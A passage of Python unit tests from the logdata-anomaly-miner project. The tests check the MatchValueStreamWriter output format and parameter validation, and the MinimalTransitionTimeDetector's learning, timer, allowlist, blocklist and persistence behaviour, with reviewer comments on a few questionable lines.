[self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list="") self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=b"Default") 
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=True)
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=123)
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=123.22)
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list={"id": "Default"})
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=())
self.assertRaises(TypeError, MatchValueAverageChangeDetector, self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=set())
# Only a list of resource URIs is accepted for log_resource_ignore_list; the bare path form ("/tmp/syslog") is rejected with ValueError above.
MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/path"], 3, 1, log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MatchValueStreamWriterTest.py000066400000000000000000000240501500476301700314200ustar00rootroot00000000000000
import unittest
from aminer.parsing.MatchContext import MatchContext
from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter
from aminer.parsing.ParserMatch import ParserMatch
from aminer.input.LogAtom import LogAtom
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummySequenceModelElement
# NOTE(review): TextIOWrapper, BufferedReader, BufferedRandom and TextIOBase are imported but not referenced anywhere in this file.
from io import StringIO, BytesIO, TextIOWrapper, BufferedReader, BufferedRandom, FileIO, BufferedWriter, TextIOBase


class MatchValueStreamWriterTest(TestBase):
    """Unittests for the MatchValueStreamWriter.

    The writer is given a list of parser paths, a separator and a missing-value marker and emits one
    line per received log atom with the matched values joined by the separator. The tests below pin
    the exact line format, the handling of paths that did not match, and the constructor's parameter
    validation (type and value checks fail the construction instead of being silently accepted).
    """

    def test1receive_atom(self):
        """Test if log atoms are processed correctly.

        Builds a dummy parser tree "match/sequence/{s1,sp,s2,sp}" over the data "25537 Euro " and
        checks the written output for: full matches, an empty separator, an empty missing-value
        marker, a partially matching atom, duplicate path entries and a non-UTF-8 byte in a value.
        """
        euro = b"Euro"
        euro_char = b"\x80"
        number = b"25537"
        space = b" "
        match_context = MatchContext(b"25537 Euro "*100)
        fdme_number = DummyFixedDataModelElement("s1", number)
        fdme_sp = DummyFixedDataModelElement("sp", space)
        fdme_euro = DummyFixedDataModelElement("s2", euro)
        fdme_euro_char = DummyFixedDataModelElement("s3", euro_char)
        sme = DummySequenceModelElement("sequence", [fdme_number, fdme_sp, fdme_euro, fdme_sp])
        mvsw = MatchValueStreamWriter(self.output_stream, ["match/sequence/s1", "match/sequence/sp", "match/sequence/s2", "match/sequence/sp"], b";", b"-")
        match_element = sme.get_match_element("match", match_context)
        # NOTE(review): this atom carries match_context.match_data (the buffer left after the match), whereas the later atoms carry
        # match_element.match_string. The assertions only depend on the parser match, so the difference appears harmless - confirm.
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, mvsw)
        # This test case sets up a set of values, which are all expected to be matched.
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; \n"*2)
        self.reset_output_stream()
        # The separator string is empty, so all values are expected to be concatenated into one string.
        mvsw.separator = b""
        mvsw.missing_value_string = b"-"
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), "25537 Euro \n"*4)
        self.reset_output_stream()
        # The missing value string is empty, so when a path does not match its field is simply left empty.
        # All paths match here, so the output is unchanged from the first case.
        mvsw.separator = b";"
        mvsw.missing_value_string = b""
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; \n"*4)
        self.reset_output_stream()
        # A set of values which are all expected to be matched, followed by an atom whose parser tree lacks s2 and the
        # second sp: the two unmatched paths must be written as the missing-value marker "-".
        mvsw.separator = b";"
        mvsw.missing_value_string = b"-"
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        other_sme = DummySequenceModelElement("sequence", [fdme_number, fdme_sp])
        match_element = other_sme.get_match_element("match", match_context)
        other_log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, mvsw)
        mvsw.receive_atom(other_log_atom)
        self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; \n"*3 + "25537; ;-;-\n")
        self.reset_output_stream()
        # Multiple spaces, but "Euro" string is missing: the path list names "match/sequence/sp" three times, and the
        # parser tree only provides it twice, so the third sp field is always the missing-value marker.
        mvsw = MatchValueStreamWriter(self.output_stream, ["match/sequence/s1", "match/sequence/sp", "match/sequence/s2", "match/sequence/sp", "match/sequence/sp"], b";", b"-")
        match_context = MatchContext(b"25537 ")
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        mvsw.receive_atom(log_atom)
        other_sme = DummySequenceModelElement("sequence", [fdme_number, fdme_sp, fdme_sp])
        match_element = other_sme.get_match_element("match", match_context)
        other_log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, mvsw)
        mvsw.receive_atom(other_log_atom)
        self.assertEqual(self.output_stream.getvalue(), "25537; ;Euro; ;-\n"*3 + "25537; ;-; ;-\n")
        self.reset_output_stream()
        # Non-ASCII input: s3 matches the single byte 0x80, which is not valid UTF-8. The expected line "25537;; \n" pins
        # that such a value is written as an EMPTY field - not as the missing-value marker "-" and not as a replacement
        # character. Callers that post-process the stream should not rely on every matched field being non-empty.
        mvsw = MatchValueStreamWriter(self.output_stream, ["match/sequence/s1", "match/sequence/s3", "match/sequence/sp"], b";", b"-")
        match_context = MatchContext(b"25537\x80 ")
        other_sme = DummySequenceModelElement("sequence", [fdme_number, fdme_euro_char, fdme_sp])
        match_element = other_sme.get_match_element("match", match_context)
        other_log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, mvsw)
        mvsw.receive_atom(other_log_atom)
        self.assertEqual(self.output_stream.getvalue(), "25537;; \n")
        self.reset_output_stream()

    def test2validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class.

        The constructor is the only place these values are checked, so every rejected type/value below is a
        misconfiguration that must fail at startup rather than produce malformed output at runtime.
        """
        # stream: must be a stream object. None, numbers, str/bytes and plain containers are TypeErrors.
        self.assertRaises(TypeError, MatchValueStreamWriter, None, ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, 123, ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, 123.3, ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, "", ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, b"", ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, True, ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, {"id": "Default"}, ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, ["Default"], ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, (), ["path"], b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, set(), ["path"], b";", b"-")
        # match_value_path_list: must be a list; a bare str or bytes is NOT accepted as a single-path shorthand.
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), None, b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), 123, b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), 123.3, b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), "path", b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), b"path", b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), True, b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), {"id": "Default"}, b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), (), b";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), set(), b";", b"-")
        # separator: bytes only (a str separator is a TypeError) and must be non-empty at construction (ValueError).
        self.assertRaises(ValueError, MatchValueStreamWriter, StringIO(), ["path"], b"", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], ";", b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], None, b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], 123, b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], 123.2, b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], True, b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], {"id": "Default"}, b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], (), b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], [b";"], b"-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], set(b";"), b"-")
        # missing_value_string: bytes only, but unlike the separator it may be empty (see the b"" constructor call below).
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", "-")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", None)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", 123)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", 123.3)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", True)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", {"id": "Default"})
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", ())
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", [b"-"])
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", set(b";"))
        # log_resource_ignore_list: a list of resource URIs. The bare filesystem path "/tmp/syslog" is a ValueError;
        # only the URI form "file:///tmp/syslog" is accepted. Non-list values are TypeErrors.
        self.assertRaises(ValueError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=["/tmp/syslog"])
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list="")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=b"Default")
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=True)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=123)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=123.22)
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list={"id": "Default"})
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=())
        self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=set())
        MatchValueStreamWriter(StringIO(), ["path"], b";", b"-", log_resource_ignore_list=["file:///tmp/syslog"])
        # Accepted configurations: text and binary in-memory streams, a raw FileIO (opened read-only on /dev/null, which
        # is FileIO's default mode - the constructor evidently does not probe writability) and a BufferedWriter.
        MatchValueStreamWriter(StringIO(), ["path"], b";", b"")
        MatchValueStreamWriter(StringIO(), ["path"], b";", b"-")
        MatchValueStreamWriter(BytesIO(), ["path"], b";", b"-")
        with FileIO("/dev/null") as f:
            MatchValueStreamWriter(f, ["path"], b";", b"-")
        # NOTE(review): a BufferedWriter over a StringIO (a text stream) is an unusual combination; only construction is exercised here.
        MatchValueStreamWriter(BufferedWriter(StringIO()), ["path"], b";", b"-")


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MinimalTransitionTimeDetectorTest.py000066400000000000000000001212361500476301700327740ustar00rootroot00000000000000
import unittest
import time
from datetime import datetime
from aminer.analysis.MinimalTransitionTimeDetector import MinimalTransitionTimeDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.MatchElement import MatchElement
from
aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase
from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD


class MinimalTransitionTimeDetectorTest(TestBase):
    """Unittests for the MinimalTransitionTimeDetector.

    The detector keeps a time_matrix keyed by (target value tuple) -> {(previous value tuple): minimal transition time}
    per id_path_list group. The tests pin when an entry is first created (and reported), how atoms without an id are
    handled, when learning stops, the persistence format, and the allowlist/blocklist/persistence-event hooks.
    """

    def test1receive_atom(self):
        """
        Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False.
        Test if stop_learning_time and stop_learning_no_anomaly_time are implemented properly.

        Fixture: six atoms at t+1 .. t+6. Atoms 1, 3, 4, 5 carry an id ("1" or "2") plus a value; atoms 2 and 6 carry only
        a value (no /model/id element). A transition is recorded the second time an id is seen, and the first entry for a
        (value, previous value) pair is reported through the event handler.
        """
        # Initialize detector for sequence length 2
        t = time.time()
        expected_string = '%s First Appearance: %s\n%s: "None" (%d lines)\n %s\n\n'
        dtf = "%Y-%m-%d %H:%M:%S"
        m1 = MatchElement("/model/id", b"1", b"1", None)
        m2 = MatchElement("/model/value", b"a", b"a", None)
        log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t+1, None)
        m4 = MatchElement("/model/value", b"b", b"b", None)
        log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t+2, None)
        m5 = MatchElement("/model/id", b"2", b"2", None)
        m6 = MatchElement("/model/value", b"a", b"a", None)
        log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t+3, None)
        m7 = MatchElement("/model/id", b"1", b"1", None)
        m8 = MatchElement("/model/value", b"c", b"c", None)
        log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t+4, None)
        m9 = MatchElement("/model/id", b"2", b"2", None)
        m10 = MatchElement("/model/value", b"b", b"b", None)
        log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t+5, None)
        m11 = MatchElement("/model/value", b"c", b"c", None)
        log_atom6 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m11])), t+6, None)
        # Default allow_missing_id=False: atoms 2 and 6 (no id) neither produce output nor change the matrix.
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, output_logline=False)
        mttd.receive_atom(log_atom1)
        self.assertEqual(self.output_stream.getvalue(), "")
        time_matrix = {}
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom2)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom3)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(mttd.time_matrix, time_matrix)
        # Second atom for id "1": transition a -> c, time 3.0 (t+4 minus t+1), reported as a first appearance.
        mttd.receive_atom(log_atom4)
        time_matrix[(m8.match_string.decode(),)] = {(m2.match_string.decode(),): log_atom4.atom_time - log_atom1.atom_time}
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), f"['{m2.match_string.decode()}'] - ['{m8.match_string.decode()}'] (['{m7.match_string.decode()}']), {log_atom4.atom_time - log_atom1.atom_time}", mttd.__class__.__name__, 1, "1c"))
        self.reset_output_stream()
        self.assertEqual(mttd.time_matrix, time_matrix)
        # Second atom for id "2": transition a -> b, time 2.0 (t+5 minus t+3).
        mttd.receive_atom(log_atom5)
        time_matrix[(m10.match_string.decode(),)] = {(m6.match_string.decode(),): log_atom5.atom_time - log_atom3.atom_time}
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), f"['{m6.match_string.decode()}'] - ['{m10.match_string.decode()}'] (['{m9.match_string.decode()}']), {log_atom5.atom_time - log_atom3.atom_time}", mttd.__class__.__name__, 1, "2b"))
        self.reset_output_stream()
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom6)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(mttd.time_matrix, time_matrix)
        # allow_missing_id=True: atoms without an id are grouped under the empty id (reported as ['']). Atom 2 (value b, t+2)
        # and atom 6 (value c, t+6) then form the transition b -> c with time 4.0, which the default configuration dropped.
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, output_logline=False, allow_missing_id=True)
        mttd.receive_atom(log_atom1)
        self.assertEqual(self.output_stream.getvalue(), "")
        time_matrix = {}
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom2)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom3)
        self.assertEqual(self.output_stream.getvalue(), "")
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom4)
        time_matrix[(m8.match_string.decode(),)] = {(m2.match_string.decode(),): log_atom4.atom_time - log_atom1.atom_time}
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), f"['{m2.match_string.decode()}'] - ['{m8.match_string.decode()}'] (['{m7.match_string.decode()}']), {log_atom4.atom_time - log_atom1.atom_time}", mttd.__class__.__name__, 1, "1c"))
        self.reset_output_stream()
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom5)
        time_matrix[(m10.match_string.decode(),)] = {(m6.match_string.decode(),): log_atom5.atom_time - log_atom3.atom_time}
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), f"['{m6.match_string.decode()}'] - ['{m10.match_string.decode()}'] (['{m9.match_string.decode()}']), {log_atom5.atom_time - log_atom3.atom_time}", mttd.__class__.__name__, 1, "2b"))
        self.reset_output_stream()
        self.assertEqual(mttd.time_matrix, time_matrix)
        mttd.receive_atom(log_atom6)
        # The target value c already has a row (from a -> c); the new previous value b is added to that existing row.
        time_matrix[(m11.match_string.decode(),)][(m4.match_string.decode(),)] = log_atom6.atom_time - log_atom2.atom_time
        self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), f"['{m4.match_string.decode()}'] - ['{m11.match_string.decode()}'] (['']), {log_atom6.atom_time - log_atom2.atom_time}", mttd.__class__.__name__, 1, "1b"))
        self.reset_output_stream()
        self.assertEqual(mttd.time_matrix, time_matrix)
        # stop_learning_time: learning is switched off once an atom arrives more than 100 s after the start. log_atom1 is still
        # at t+1 here; t+99 keeps learn_mode, t+102 clears it. (Both values are consistent with the window starting at t or at
        # t+1, so the exact anchor is not pinned by this test.) receive_atom keeps returning True after learning stopped.
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, allow_missing_id=True, stop_learning_time=100)
        self.assertTrue(mttd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 99
        self.assertTrue(mttd.receive_atom(log_atom1))
        self.assertTrue(mttd.learn_mode)
        log_atom1.atom_time = t + 102
        self.assertTrue(mttd.receive_atom(log_atom1))
        self.assertFalse(mttd.learn_mode)
        # stop_learning_no_anomaly_time: learning stops once 100 s pass without a new matrix entry. The new entries created at
        # t+100 keep learn_mode on; the atom at t+201 is the first one more than 100 s after that and clears it.
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, allow_missing_id=True, stop_learning_no_anomaly_time=100)
        log_atom1.atom_time = t
        self.assertTrue(mttd.receive_atom(log_atom1))
        log_atom1.atom_time = t + 100
        self.assertTrue(mttd.receive_atom(log_atom1))
        self.assertTrue(mttd.learn_mode)
        log_atom2.atom_time = t + 100
        self.assertTrue(mttd.receive_atom(log_atom2))
        self.assertTrue(mttd.learn_mode)
        # NOTE(review): this sets log_atom1's time but then feeds log_atom3, whose atom_time is still t+3; the assignment is
        # overwritten two lines later. This looks like a leftover (probably log_atom3.atom_time was meant) - confirm intent.
        log_atom1.atom_time = t + 200
        self.assertTrue(mttd.receive_atom(log_atom3))
        self.assertTrue(mttd.learn_mode)
        log_atom1.atom_time = t + 201
        self.assertTrue(mttd.receive_atom(log_atom1))
        self.assertFalse(mttd.learn_mode)

    def test2do_timer(self):
        """Test if the do_timer method is implemented properly.

        do_timer returns the seconds left until next_persist_time; when that time is reached it persists and returns
        DEFAULT_PERSISTENCE_PERIOD. The t+999 -> 1 / t+1000 -> period pair implies next_persist_time was re-armed at
        t+400 + DEFAULT_PERSISTENCE_PERIOD (i.e. the constant is 600 s in this code base).
        """
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
        t = time.time()
        mttd.next_persist_time = t + 400
        self.assertEqual(mttd.do_timer(t + 200), 200)
        self.assertEqual(mttd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(mttd.do_timer(t + 999), 1)
        self.assertEqual(mttd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """Test if the allowlist_event method is implemented properly.

        allowlist_event must reject events of another analysis component and any extra allowlisting data, and must
        append the given path to constraint_list regardless of learn_mode.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
        analysis = "Analysis.%s"
        self.assertRaises(Exception, mttd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The MinimalTransitionTimeDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, mttd.allowlist_event, analysis % mttd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(mttd.allowlist_event(analysis % mttd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % mttd.__class__.__name__))
        self.assertEqual(mttd.constraint_list, ["/s1"])
        # Allowlisting is an operator action and still takes effect when the detector is no longer learning.
        mttd.learn_mode = False
        self.assertEqual(mttd.allowlist_event(analysis % mttd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % mttd.__class__.__name__))
        self.assertEqual(mttd.constraint_list, ["/s1", "/d1"])

    def test4blocklist_event(self):
        """Test if the blocklist_event method is implemented properly.

        Mirror of test3 for blocklist_event: foreign event types and extra data raise, and the path is appended to
        ignore_list regardless of learn_mode. (The local name "esd" is historical; it is a MinimalTransitionTimeDetector.)
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        esd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
        analysis = "Analysis.%s"
        self.assertRaises(Exception, esd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The MinimalTransitionTimeDetector can not handle blocklisting data and therefore an exception is expected.
        self.assertRaises(Exception, esd.blocklist_event, analysis % esd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % esd.__class__.__name__))
        self.assertEqual(esd.ignore_list, ["/s1"])
        esd.learn_mode = False
        self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % esd.__class__.__name__))
        self.assertEqual(esd.ignore_list, ["/s1", "/d1"])

    def test5persistence(self):
        """Test the do_persist and load_persistence_data methods.

        Replays the fixture of test1 (default allow_missing_id) and pins the on-disk representation: a JSON-style text
        document with "string:"-prefixed values (a typed text encoding, not a binary pickle), in the order
        [transition times, target values, previous values]. A second detector constructed with the same configuration
        must pick the persisted matrix up on its own.
        """
        t = time.time()
        m1 = MatchElement("/model/id", b"1", b"1", None)
        m2 = MatchElement("/model/value", b"a", b"a", None)
        log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t+1, None)
        m4 = MatchElement("/model/value", b"b", b"b", None)
        log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t+2, None)
        m5 = MatchElement("/model/id", b"2", b"2", None)
        m6 = MatchElement("/model/value", b"a", b"a", None)
        log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t+3, None)
        m7 = MatchElement("/model/id", b"1", b"1", None)
        m8 = MatchElement("/model/value", b"c", b"c", None)
        log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t+4, None)
        m9 = MatchElement("/model/id", b"2", b"2", None)
        m10 = MatchElement("/model/value", b"b", b"b", None)
        log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t+5, None)
        m11 = MatchElement("/model/value", b"c", b"c", None)
        log_atom6 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m11])), t+6, None)
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, output_logline=False)
        mttd.receive_atom(log_atom1)
        mttd.receive_atom(log_atom2)
        mttd.receive_atom(log_atom3)
        mttd.receive_atom(log_atom4)
        mttd.receive_atom(log_atom5)
        mttd.receive_atom(log_atom6)
        mttd.do_persist()
        with open(mttd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '[[[3.0], [2.0]], [["string:c"], ["string:b"]], [[["string:a"]], [["string:a"]]]]')
        self.assertEqual(mttd.time_matrix, {("c",): {("a",): 3.0}, ("b",): {("a",): 2.0}})
        # NOTE(review): this resets an attribute named "sequences", not time_matrix, so the in-memory matrix is never cleared
        # and the assertion after load_persistence_data() would also pass if loading were a no-op. The round trip that is
        # actually verified is the fresh "other" detector below; consider `mttd.time_matrix = {}` here - confirm.
        mttd.sequences = {}
        mttd.load_persistence_data()
        self.assertEqual(mttd.time_matrix, {('c',): {('a',): 3.0}, ('b',): {('a',): 2.0}})
        other = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], num_log_lines_solidify_matrix=5, learn_mode=True)
        self.assertEqual(other.time_matrix, mttd.time_matrix)

    def test6add_to_persistence_event(self):
        """Test that add_to_persistence_event inserts a [target values, previous values, time] triple into time_matrix.

        Values arrive as lists and are stored as tuples keys: [["a"], ["1"], 3.0] becomes {("a",): {("1",): 3.0}}.
        """
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
        mttd.add_to_persistence_event("Analysis.MinimalTransitionTimeDetector", [["a"], ["1"], 3.0])
        self.assertEqual(mttd.time_matrix, {("a",): {("1",): 3.0}})

    def test7remove_from_persistence_event(self):
        """Test that remove_from_persistence_event deletes a [target values, previous values] pair from time_matrix.

        Removing the only previous-value entry of a row removes the row itself, leaving an empty matrix.
        """
        mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"])
        mttd.time_matrix = {("a",): {("1",): 3.0}}
        mttd.remove_from_persistence_event("Analysis.MinimalTransitionTimeDetector", [["a"], ["1"]])
        self.assertEqual(mttd.time_matrix, {})

    def test8validate_parameters(self):
        """Test all initialization parameters for the detector.
